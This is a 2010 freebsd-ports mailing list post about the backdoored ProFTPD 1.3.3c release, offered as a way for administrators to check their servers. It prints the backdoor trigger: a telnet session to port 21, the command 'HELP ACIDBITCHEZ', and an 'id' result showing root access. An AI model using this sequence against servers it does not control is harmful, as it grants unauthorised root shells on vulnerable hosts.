ftp/proftpd 1.3.3c with a version which contained a backdoor.
Ivan Klymenko
fidaj at ukr.net
Thu Dec 2 21:49:17 UTC 2010
В Thu, 2 Dec 2010 23:22:06 +0200
Ivan Klymenko <fidaj at ukr.net> пишет:
> Hello, people!
> What do you think is it worth to pay attention to these events:
> http://sourceforge.net/mailarchive/message.php?msg_name=alpine.DEB.2.00.1012011542220.12930%40familiar.castaglia.org
>
> and that in this case needs to be done with the port ftp/proftpd
> itself?
>
> Thanks!
Check vulnerability of your server, you can by using the following
command sequence:
$ telnet 1.2.3.4 21
Trying 1.2.3.4...
Connected to 1.2.3.4
Escape character is '^]'.
220 ProFTPD 1.3.3c Server (ProFTPD Default Installation) [1.2.3.4]
HELP ACIDBITCHEZ
id ;
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
More information about the freebsd-ports
mailing list